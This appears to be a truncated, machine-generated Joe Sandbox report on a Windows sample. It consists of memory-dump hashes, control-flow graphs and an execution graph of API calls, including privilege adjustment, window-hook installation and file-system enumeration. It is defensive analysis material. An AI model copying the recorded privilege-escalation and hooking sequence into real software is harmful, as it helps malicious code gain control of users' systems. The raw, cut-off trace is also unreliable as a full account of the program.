                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
                                                                                                                • String ID: T7B$VPWh
                                                                                                                • API String ID: 3089971210-2601699101
                                                                                                                • Opcode ID: 0243d08ce549b15ef0027c87d88584c7aae207ae101b4b44588c0eba0b3d6897
                                                                                                                • Instruction ID: 530d31039de337bece1335ea06a066dd857e6e7da8ecb1207ca392e240c8f14c
                                                                                                                • Opcode Fuzzy Hash: 0243d08ce549b15ef0027c87d88584c7aae207ae101b4b44588c0eba0b3d6897
                                                                                                                • Instruction Fuzzy Hash: C901E9327047306ACA31BF7A780265EA7B19F8276ABA4005FF8802B281DE2D4F41C65C

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 35 422040-4220f1 36 4220f3-4220f7 35->36 37 422142-422301 call 4847aa call 481e90 RtlAdjustPrivilege 36->37 38 4220f9-422103 36->38 51 422303-422315 call 4f7a1a call 421c40 37->51 39 422105-422110 38->39 40 42213f 38->40 42 422112-42211d 39->42 43 42213a-42213d 39->43 40->37 45 422135-422138 42->45 46 42211f-422131 42->46 43->37 45->37 46->36 47 422133 46->47 47->37 55 42231a-422321 51->55 55->51 56 422323-42244a call 48e5b6 55->56 56->51 59 422450-422467 call 48d6bb call 4e530b 56->59 59->51 64 42246d-4224a0 call 48d996 59->64 67 4224a2-4224a6 64->67 68 4224b6-4224c8 call 47bf3c 64->68 67->68 69 4224a8-4224b1 call 421f10 67->69 74 4224f7-4224fe call 421ce0 68->74 75 4224ca-4224e7 call 4e02d7 call 4a1bfb 68->75 69->51 74->51 80 422504-42250d 74->80 75->74 85 4224e9-4224f2 call 421f10 75->85 82 422510-422560 80->82 82->82 84 422562-422567 82->84 86 422569 84->86 87 42257e-42259e call 423080 84->87 85->51 90 422570-42257c 86->90 93 4225a0-4225fc 87->93 90->87 90->90 93->93 94 4225fe-422603 93->94 94->51 95 422609 94->95 96 422610-42261c 95->96 96->96 97 42261e 96->97 97->51
                                                                                                                APIs
                                                                                                                • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,00000000), ref: 00422301
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustPrivilege
                                                                                                                • String ID: >n[
                                                                                                                • API String ID: 3260937286-2858838698
                                                                                                                • Opcode ID: 4db8cc55700e274585cd7cef989a61d2ec908114e4f126661dc4d532bd8efff8
                                                                                                                • Instruction ID: 39c43bfc3d6c3962c4d77cb623078b6444c2b646aabfe2c7320cf86ac284f76b
                                                                                                                • Opcode Fuzzy Hash: 4db8cc55700e274585cd7cef989a61d2ec908114e4f126661dc4d532bd8efff8
                                                                                                                • Instruction Fuzzy Hash: B90249B4D04358EADB15CFA8DA81BEDBBB0BF59304F14929AD848BB351E7341A81DF04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C
                                                                                                                • API String ID: 0-1037565863
                                                                                                                • Opcode ID: df1c6e62853feafcb348d590a78cf957361b35190de3b2fc678e05946afce8e3
                                                                                                                • Instruction ID: 5dbe7984de8f85c7d75440a92c1a164676ac9c054dfb81494d66e1e6fa126512
                                                                                                                • Opcode Fuzzy Hash: df1c6e62853feafcb348d590a78cf957361b35190de3b2fc678e05946afce8e3
                                                                                                                • Instruction Fuzzy Hash: DE318F354187088B8718FF36F88549BB3A6FBE5310F108A3ED586C7556EF355116CB85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a797275b9167bd967ee11d8a7932701e26c196e00fb3a382749bb5ba7c5bd4b1
                                                                                                                • Instruction ID: b1cc327c6954047dbf85218dcd38c42e47bd77acc5204ec104efcb4cf49ddb7f
                                                                                                                • Opcode Fuzzy Hash: a797275b9167bd967ee11d8a7932701e26c196e00fb3a382749bb5ba7c5bd4b1
                                                                                                                • Instruction Fuzzy Hash: F0E04F311000586ECA217B16D942F5E3B5DDB00344B41041BFC0496222DE3DEDA1C698
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmp

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00423F37
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00423F3F
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00423FC8
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00423FF3
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00424048
                                                                                                                Similarity
                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: T7B$csm
                                                                                                                • API String ID: 1170836740-3288471982

                                                                                                                Control-flow Graph

                                                                                                                Similarity
                                                                                                                • API ID: _strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3213747228-0

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:5.3%
                                                                                                                Dynamic/Decrypted Code Coverage:16.7%
                                                                                                                Signature Coverage:0.8%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:86
32 API calls 120380->120382 120381 41ec1c 120381->120377 120560 4c2c3a 120381->120560 120384 41ec6d 120382->120384 120389 41ec79 120384->120389 120390 41ec83 __EH_prolog 120389->120390 120719 4813d0 120390->120719 120392 41eca4 120393 41ecf3 120392->120393 120726 4c9c03 66 API calls ctype 120392->120726 120394 4c5eaa ctype 32 API calls 120393->120394 120396 41ecff 120394->120396 120397 4c5eaa ctype 32 API calls 120396->120397 120400 41ed0b 120397->120400 120398 41ecb6 120398->120393 120399 4c2c3a 62 API calls 120398->120399 120401 41ecce 120399->120401 120405 4c5f18 120400->120405 120401->120393 120402 4c5c1f ctype 36 API calls 120401->120402 120403 41ece8 120402->120403 120727 46da16 141 API calls 2 library calls 120403->120727 120406 4c5f2c 120405->120406 120412 4c5f3f ctype 120405->120412 120407 4c5f36 120406->120407 120408 4c5f41 lstrlen 120406->120408 120730 4c9c03 66 API calls ctype 120407->120730 120410 4c5f4e 120408->120410 120408->120412 120411 4c5d17 ctype 31 API calls 120410->120411 120411->120412 120412->120345 120413->120353 120415 406c9b _rand __EH_prolog ctype 120414->120415 120416 4c6033 ctype 35 API calls 120415->120416 120417 406ced ctype 120416->120417 120731 4c5707 120417->120731 120420 406d41 ctype 120423 4c5707 ctype 48 API calls 120420->120423 120421 406d19 120749 4c564a 120421->120749 120425 406d61 120423->120425 120424 406d32 120429 4c5eaa ctype 32 API calls 120424->120429 120426 406da1 120425->120426 120427 406d68 120425->120427 120432 406de3 120426->120432 120433 406daa 120426->120433 120756 4c5922 38 API calls ctype 120427->120756 120431 406faa 120429->120431 120430 406d6d 120436 4c564a ctype 39 API calls 120430->120436 120517 41eea7 141 API calls 120431->120517 120744 407109 29 API calls ctype 120432->120744 120757 4c5922 38 API calls ctype 120433->120757 120439 406d86 120436->120439 120437 406df3 120440 406e35 120437->120440 120441 406dfb 120437->120441 120438 406db2 120758 4c5922 38 API calls ctype 120438->120758 120443 4c564a ctype 
39 API calls 120439->120443 120446 406e8e 120440->120446 120453 406e54 120440->120453 120759 4c5922 38 API calls ctype 120441->120759 120487 406d92 120443->120487 120445 406dba 120449 4c564a ctype 39 API calls 120445->120449 120448 4c512e ctype 29 API calls 120446->120448 120447 406e03 120760 4c5922 38 API calls ctype 120447->120760 120451 406e94 120448->120451 120452 406dc6 120449->120452 120455 406ed8 120451->120455 120456 406e9c 120451->120456 120457 4c564a ctype 39 API calls 120452->120457 120761 4c5922 38 API calls ctype 120453->120761 120454 406e0b 120459 4c564a ctype 39 API calls 120454->120459 120470 406f01 120455->120470 120765 4c58d8 38 API calls ctype 120455->120765 120763 4c5922 38 API calls ctype 120456->120763 120457->120487 120461 406e5c 120762 4c5922 38 API calls ctype 120461->120762 120472 406e64 120487->120424 120517->120357 120518->120359 120525 4815f8 120524->120525 120526 481606 120524->120526 120525->120366 120534 4815a0 120526->120534 120530 481780 120529->120530 120546 48a7d0 120530->120546 120532 41ef36 120532->120369 120533->120374 120535 4815b9 120534->120535 120536 4815b3 120534->120536 120540 48c8d0 120535->120540 120544 489da0 141 API calls ctype 120536->120544 120541 48c8ea 120540->120541 120543 4815d5 120541->120543 120545 48c950 141 API calls ctype 120541->120545 120543->120366 120544->120535 120545->120543 120547 48a7e1 120546->120547 120552 48a7ec 120546->120552 120556 482a80 141 API calls ctype 120547->120556 120548 48a821 120558 48a940 141 API calls ctype 120548->120558 120550 48a7f8 ctype 120553 48a82f 120550->120553 120557 48a840 141 API calls ctype 120550->120557 120552->120548 120552->120550 120553->120532 120555 48a819 120555->120532 120556->120552 120557->120555 120558->120553 120559->120381 120569 4c28ed 120560->120569 120563 4c5c1f 120564 4c5c3c 120563->120564 120565 4c5c2e InterlockedIncrement 120563->120565 120704 4c6033 120564->120704 120566 41ec4a 120565->120566 120568 46da16 141 API calls 2 library calls 
120566->120568 120568->120377 120581 4c2906 _rand ctype _wctomb_s 120569->120581 120570 4c2c0a 120583 4c62da 120570->120583 120576 4b0298 6 API calls 120576->120581 120578 4af2db 6 API calls 120578->120581 120580 4c2b2d lstrlen 120580->120581 120581->120570 120581->120576 120581->120578 120581->120580 120599 4b1d03 29 API calls ctype 120581->120599 120600 4b00aa 48 API calls ctype 120581->120600 120584 4c62ed 120583->120584 120588 4c2c17 120584->120588 120601 4c5d17 120584->120601 120586 4c6304 ctype 120608 4c5e12 32 API calls ctype 120586->120608 120589 4b547c 120588->120589 120666 4b8de9 120589->120666 120592 4b54b3 120594 4c6329 120592->120594 120697 4c5e53 120594->120697 120596 4c6331 120597 4c633a lstrlen 120596->120597 120598 41ec2f 120596->120598 120597->120598 120598->120377 120598->120563 120599->120581 120600->120581 120602 4c5d23 120601->120602 120604 4c5d2c 120601->120604 120602->120586 120603 4c5d34 120609 4a8f6c 120603->120609 120604->120603 120606 4c5d73 120604->120606 120616 4c512e 120606->120616 120608->120588 120620 4aef44 120609->120620 120611 4a8f76 RtlEnterCriticalSection 120612 4a8f94 120611->120612 120613 4a8fc5 RtlLeaveCriticalSection 120611->120613 120621 4c3bc1 29 API calls ctype 120612->120621 120613->120602 120615 4a8fa6 120615->120613 120618 4c5134 120616->120618 120619 4c5152 120618->120619 120622 4af1a1 120618->120622 120619->120602 120620->120611 120621->120615 120625 4af1b3 120622->120625 120626 4af1b0 120625->120626 120628 4af1ba _rand 120625->120628 120626->120618 120628->120626 120629 4af1df 120628->120629 120630 4af20c 120629->120630 120633 4af24f 120629->120633 120636 4af23a 120630->120636 120647 4b62f4 120630->120647 120632 4af2be RtlAllocateHeap 120643 4af241 120632->120643 120633->120636 120637 4af271 120633->120637 120634 4af222 120662 4b7333 5 API calls _rand 120634->120662 120636->120632 120636->120643 120639 4b62f4 ctype 28 API calls 120637->120639 120638 4af22d 120663 4af246 RtlLeaveCriticalSection ctype 120638->120663 
120641 4af278 120639->120641 120664 4b7dd6 6 API calls 2 library calls 120641->120664 120643->120628 120644 4af28b 120665 4af2a5 RtlLeaveCriticalSection ctype 120644->120665 120646 4af298 120646->120636 120646->120643 120648 4b634a RtlEnterCriticalSection 120647->120648 120649 4b630c 120647->120649 120648->120634 120650 4af1a1 ctype 27 API calls 120649->120650 120651 4b6314 120650->120651 120652 4b6322 120651->120652 120653 4b21ae _rand 7 API calls 120651->120653 120654 4b62f4 ctype 27 API calls 120652->120654 120653->120652 120655 4b632a 120654->120655 120656 4b633b 120655->120656 120657 4b6331 RtlInitializeCriticalSection 120655->120657 120659 4af0b8 ___free_lc_time 27 API calls 120656->120659 120658 4b6340 120657->120658 120660 4b6355 ctype RtlLeaveCriticalSection 120658->120660 120659->120658 120661 4b6348 120660->120661 120661->120648 120662->120638 120663->120636 120664->120644 120665->120646 120667 4b54a9 120666->120667 120670 4b8e11 __aulldiv __aullrem _rand ctype 120666->120670 120667->120592 120675 4b8cd1 44 API calls ctype 120667->120675 120668 4b9587 44 API calls ctype 120668->120670 120669 4af1a1 ctype 29 API calls 120669->120670 120670->120667 120670->120668 120670->120669 120672 4b95bc 44 API calls ctype 120670->120672 120673 4b95ed 44 API calls ctype 120670->120673 120674 4b1e11 39 API calls ctype 120670->120674 120676 4af0b8 120670->120676 120672->120670 120673->120670 120674->120670 120675->120592 120677 4af192 120676->120677 120678 4af0e6 120676->120678 120677->120670 120679 4af0f0 120678->120679 120680 4af12b 120678->120680 120681 4b62f4 ctype 28 API calls 120679->120681 120683 4b62f4 ctype 28 API calls 120680->120683 120692 4af11c 120680->120692 120684 4af0f7 ___free_lc_time 120681->120684 120682 4af184 RtlFreeHeap 120682->120677 120689 4af137 ___free_lc_time 120683->120689 120685 4af111 120684->120685 120693 4b700a VirtualFree VirtualFree HeapFree ___free_lc_time 120684->120693 120694 4af122 RtlLeaveCriticalSection ctype 120685->120694 120688 
4af163 120696 4af17a RtlLeaveCriticalSection ctype 120688->120696 120689->120688 120695 4b7d91 VirtualFree HeapFree VirtualFree ___free_lc_time 120689->120695 120692->120677 120692->120682 120693->120685 120694->120692 120695->120688 120696->120692 120698 4c5e6e ctype 120697->120698 120699 4c5e5f 120697->120699 120698->120596 120703 4c5de1 32 API calls ctype 120699->120703 120701 4c5e64 120702 4c5d17 ctype 31 API calls 120701->120702 120702->120698 120703->120701 120705 4c603f 120704->120705 120706 4c6043 lstrlen 120704->120706 120709 4c5fb6 120705->120709 120706->120705 120708 4c6053 120708->120566 120712 4c5e81 120709->120712 120711 4c5fc4 ctype 120711->120708 120713 4c5e91 120712->120713 120714 4c5ea5 120713->120714 120718 4c5de1 32 API calls ctype 120713->120718 120714->120711 120716 4c5e9d 120717 4c5d17 ctype 31 API calls 120716->120717 120717->120714 120718->120716 120721 4813e1 120719->120721 120720 4813ea 120720->120392 120721->120720 120728 48a760 141 API calls ctype 120721->120728 120723 481426 120723->120392 120724 481402 120724->120723 120729 489da0 141 API calls ctype 120724->120729 120726->120398 120727->120393 120728->120724 120729->120723 120730->120412 120784 4c5e35 120731->120784 120736 4c6033 ctype 35 API calls 120737 4c574d CreateFileA 120736->120737 120739 4c57ed 120737->120739 120740 406d15 120737->120740 120739->120740 120741 4c57f4 GetLastError 120739->120741 120740->120420 120740->120421 120742 4c5803 ctype 120741->120742 120743 4c6033 ctype 35 API calls 120742->120743 120743->120740 120744->120437 120750 4c5654 __EH_prolog 120749->120750 120751 4c5679 120750->120751 120752 4c5674 120750->120752 120753 4c5eaa ctype 32 API calls 120751->120753 120812 4c5922 38 API calls ctype 120752->120812 120755 4c5685 120753->120755 120755->120424 120756->120430 120757->120438 120758->120445 120759->120447 120760->120454 120761->120461 120762->120472 120785 4c5e3d 120784->120785 120786 4c5730 120784->120786 120787 4c6033 ctype 35 API calls 120785->120787 
120788 4c5a33 120786->120788 120787->120786 120803 4aef44 120788->120803 120790 4c5a3d GetFullPathNameA 120791 4c5a60 lstrcpyn 120790->120791 120792 4c5a72 120790->120792 120801 4c573f 120791->120801 120804 4c5b03 120792->120804 120795 4c5aa3 120796 4c5aa9 CharUpperA 120795->120796 120797 4c5ab0 120795->120797 120796->120797 120799 4c5ab6 FindFirstFileA 120797->120799 120800 4c5ae2 120797->120800 120798 4c5eaa ctype 32 API calls 120798->120801 120799->120800 120802 4c5acb FindClose lstrcpy 120799->120802 120800->120798 120801->120736 120802->120800 120803->120790 120805 4c62da ctype 34 API calls 120804->120805 120806 4c5b15 ctype 120805->120806 120807 4c5b21 lstrcpyn 120806->120807 120808 4c5b34 ctype 120807->120808 120809 4c6329 ctype 35 API calls 120808->120809 120810 4c5a89 GetVolumeInformationA 120809->120810 120810->120795 120810->120800 120812->120751 120816 4c6c09 120823 4d490d 120816->120823 120819 4c6c67 120822 4c6c6b 120819->120822 120829 4c6aaa 120819->120829 120824 4d4917 __EH_prolog 120823->120824 120825 4c6c1d 120824->120825 120857 4d435c 120824->120857 120825->120819 120856 4c8910 7 API calls 120825->120856 120868 4aef44 120829->120868 120831 4c6ab4 GetPropA 120832 4c6b94 120831->120832 120833 4c6ae7 120831->120833 120834 4c69ad 58 API calls 120832->120834 120835 4c6af0 120833->120835 120836 4c6b73 120833->120836 120837 4c6b9c 120834->120837 120838 4c6b4f SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 120835->120838 120839 4c6af5 120835->120839 120840 4c69ad 58 API calls 120836->120840 120841 4c69ad 58 API calls 120837->120841 120843 4c6bb2 CallWindowProcA 120838->120843 120842 4c6b00 120839->120842 120839->120843 120844 4c6b79 120840->120844 120845 4c6ba4 120841->120845 120869 4c69ad 120842->120869 120847 4c6b3b 120843->120847 120890 4c676c 66 API calls 120844->120890 120891 4c670b 120845->120891 120847->120822 120851 4c6b8b 120852 4c6bae 120851->120852 120852->120843 120852->120847 120854 4c6b16 CallWindowProcA 120877 4c6692 
120854->120877 120856->120819 120858 4d436c 120857->120858 120859 4d4367 120857->120859 120861 4d43c8 120858->120861 120862 4d43b9 RtlEnterCriticalSection 120858->120862 120863 4d4390 RtlEnterCriticalSection 120858->120863 120867 4d42c9 GetVersion RtlInitializeCriticalSection 120859->120867 120866 4d43cc RtlLeaveCriticalSection 120861->120866 120862->120861 120864 4d439e RtlInitializeCriticalSection 120863->120864 120865 4d43b1 RtlLeaveCriticalSection 120863->120865 120864->120865 120865->120862 120866->120825 120867->120858 120868->120831 120900 4c693b 120869->120900 120871 4c69b6 120908 4cb504 120871->120908 120873 4c69c3 120914 4c9665 120873->120914 120875 4c69cd 120876 4c666f GetWindowRect GetWindowLongA 120875->120876 120876->120854 120878 4c669f 120877->120878 120879 4c6706 120877->120879 120880 4c93e0 GetWindowLongA 120878->120880 120879->120847 120881 4c66a9 120880->120881 120881->120879 120882 4c66b0 GetWindowRect 120881->120882 120882->120879 120883 4c66c7 120882->120883 120883->120879 120884 4c66cf GetWindow 120883->120884 120885 4c69ad 58 API calls 120884->120885 120886 4c66e0 120885->120886 120887 4c66eb 120886->120887 120888 4c95b9 IsWindowEnabled 120886->120888 120887->120879 120955 4c8a45 120887->120955 120888->120887 120890->120851 120892 4c93e0 GetWindowLongA 120891->120892 120893 4c671d 120892->120893 120894 4c6765 120893->120894 120994 4c7fd9 120893->120994 120894->120852 120896 4c672b 120897 4c7fd9 62 API calls 120896->120897 120898 4c6737 120897->120898 120898->120894 120899 4c6750 SendMessageA 120898->120899 120899->120894 120901 4c6945 __EH_prolog 120900->120901 120918 4d3761 120901->120918 120903 4c694b ctype 120904 4c512e ctype 29 API calls 120903->120904 120906 4c6989 ctype 120903->120906 120905 4c696d 120904->120905 120905->120906 120923 4cb49f 29 API calls 2 library calls 120905->120923 120906->120871 120909 4cb50e __EH_prolog ctype 120908->120909 120910 4cb583 120909->120910 120913 4cb51f ctype 120909->120913 120953 4c23d5 
RaiseException ctype 120909->120953 120954 4c4cf2 29 API calls ctype 120910->120954 120913->120873 120915 4c966c 120914->120915 120916 4c9688 ctype 120914->120916 120915->120916 120917 4c9672 GetParent 120915->120917 120916->120875 120917->120916 120924 4d373b 120918->120924 120923->120906 120925 4d4878 ctype 21 API calls 120924->120925 120926 4d374a 120925->120926 120927 4d3760 120926->120927 120928 4d490d ctype 7 API calls 120926->120928 120929 4d4878 120927->120929 120928->120927 120930 4d48ae TlsGetValue 120929->120930 120931 4d4881 120929->120931 120932 4d48c1 120930->120932 120936 4d489b 120931->120936 120950 4d4478 RaiseException TlsAlloc RtlInitializeCriticalSection ctype 120931->120950 120934 4d3777 120932->120934 120938 4d48d4 120932->120938 120934->120903 120940 4d4511 RtlEnterCriticalSection 120936->120940 120937 4d48ac 120937->120930 120951 4d4680 8 API calls ctype 120938->120951 120942 4d4530 120940->120942 120941 4d45ec ctype 120945 4d4601 RtlLeaveCriticalSection 120941->120945 120942->120941 120943 4d457d GlobalHandle GlobalUnlock GlobalReAlloc 120942->120943 120944 4d456a GlobalAlloc 120942->120944 120946 4d459f 120943->120946 120944->120946 120945->120937 120947 4d45ad GlobalHandle GlobalLock RtlLeaveCriticalSection 120946->120947 120948 4d45c8 GlobalLock 120946->120948 120952 4c23d5 RaiseException ctype 120947->120952 120948->120941 120950->120936 120951->120934 120954->120913 120956 4c93e0 GetWindowLongA 120955->120956 120957 4c8a58 120956->120957 120958 4c8a62 120957->120958 120960 4c8a6d GetParent 120957->120960 120961 4c8a78 GetWindow 120957->120961 120959 4c8a9f GetWindowRect 120958->120959 120963 4c8ab8 120959->120963 120964 4c8b43 GetParent GetClientRect GetClientRect MapWindowPoints 120959->120964 120962 4c8a83 120960->120962 120961->120962 120962->120959 120967 4c8a89 SendMessageA 120962->120967 120965 4c8abc GetWindowLongA 120963->120965 120966 4c8acc 120963->120966 120974 4c8b70 120964->120974 120965->120966 120968 4c8b1a GetWindowRect 
120966->120968 120969 4c8ae0 120966->120969 120967->120959 120970 4c8a9d 120967->120970 120992 4a6dc1 14 API calls 120968->120992 120989 40f916 28 API calls ctype 120969->120989 120970->120959 120973 4c8ae5 120990 4a6dc1 14 API calls 120973->120990 120985 4c9543 120974->120985 120975 4c8b2d 120993 4a6e2c 12 API calls 120975->120993 120978 4c8b33 CopyRect 120978->120974 120981 4c8af8 120991 4a6e2c 12 API calls 120981->120991 120984 4c8afe CopyRect CopyRect 120984->120974 120986 4c8bf3 120985->120986 120987 4c954d SetWindowPos 120985->120987 120986->120879 120987->120986 120989->120973 120990->120981 120991->120984 120992->120975 120993->120978 120995 4c7fe4 120994->120995 120997 4c7fdd 120994->120997 120995->120896 120997->120995 120998 4c7ff9 120997->120998 121001 4c7f94 62 API calls 120997->121001 120999 4c69ad 58 API calls 120998->120999 121000 4c7fff 120999->121000 121000->120896 121001->120997 121002 416307 121005 47e64a LoadLibraryA 121002->121005 121004 41630f 121005->121004 121006 4c6c85 121007 4d4878 ctype 21 API calls 121006->121007 121008 4c6c9a 121007->121008 121009 4c6cba 121008->121009 121010 4c6ca3 CallNextHookEx 121008->121010 121011 4d373b ctype 28 API calls 121009->121011 121012 4c6e72 121010->121012 121013 4c6cca 121011->121013 121014 4c6d3f 121013->121014 121015 4c6cf3 GetClassLongA 121013->121015 121032 4c6de2 CallNextHookEx 121013->121032 121018 4c6d47 121014->121018 121019 4c6df0 GetWindowLongA 121014->121019 121016 4c6d07 121015->121016 121015->121032 121021 4c6d2b lstrcmpiA 121016->121021 121022 4c6d14 GlobalGetAtomNameA 121016->121022 121039 4c69f2 58 API calls ctype 121018->121039 121020 4c6e00 GetPropA 121019->121020 121019->121032 121025 4c6e13 SetPropA GetPropA 121020->121025 121020->121032 121021->121014 121021->121032 121022->121021 121024 4c6e65 UnhookWindowsHookEx 121024->121012 121026 4c6e27 GlobalAddAtomA 121025->121026 121025->121032 121027 4c6e3c 121026->121027 121028 4c6e41 SetWindowLongA 121026->121028 121027->121028 
121028->121032 121029 4c6dcd 121031 4c6dd2 SetWindowLongA 121029->121031 121030 4c6d4f 121030->121029 121040 4c67e2 121030->121040 121031->121032 121032->121012 121032->121024 121035 4c6d99 121036 4c6d9e GetWindowLongA 121035->121036 121037 4c6dbb 121036->121037 121037->121032 121038 4c6dbf SetWindowLongA 121037->121038 121038->121032 121039->121030 121041 4c67ec __EH_prolog 121040->121041 121042 4d4878 ctype 21 API calls 121041->121042 121043 4c6804 121042->121043 121044 4c6861 121043->121044 121059 4c666f GetWindowRect GetWindowLongA 121043->121059 121050 4c786d 121044->121050 121047 4c688a 121047->121029 121047->121035 121048 4c6692 95 API calls 121048->121047 121060 4c78b1 121050->121060 121127 4d0816 121050->121127 121133 4d06b4 121050->121133 121139 4d029e 121050->121139 121144 4c6914 121050->121144 121051 4c788f 121052 4c6872 121051->121052 121149 4c728c 121051->121149 121052->121047 121052->121048 121059->121044 121063 4c78bb __EH_prolog 121060->121063 121061 4c78d2 121061->121051 121062 4c792f 121065 4c794c 121062->121065 121066 4c7934 121062->121066 121063->121061 121063->121062 121064 4c69ad 58 API calls 121063->121064 121067 4c7925 121064->121067 121071 4d435c ctype 6 API calls 121065->121071 121165 4c676c 66 API calls 121066->121165 121069 4c670b 64 API calls 121067->121069 121069->121062 121070 4c7944 121070->121061 121070->121065 121072 4c796d 121071->121072 121073 4c798b 121072->121073 121077 4c79b2 121072->121077 121166 4d43cc RtlLeaveCriticalSection 121073->121166 121074 4c7a2f 121167 4d43cc RtlLeaveCriticalSection 121074->121167 121077->121074 121078 4c7a4d 121077->121078 121088 4c7d10 121077->121088 121168 4d43cc RtlLeaveCriticalSection 121078->121168 121079 4c7a69 GetVersion 121080 4c7a7b 121079->121080 121080->121061 121083 4c7a8c 121080->121083 121084 4c7c09 121080->121084 121085 4c7c42 121080->121085 121086 4c7b9e 121080->121086 121087 4c7c17 121080->121087 121080->121088 121089 4c7beb 121080->121089 121090 4c7c21 121080->121090 121091 
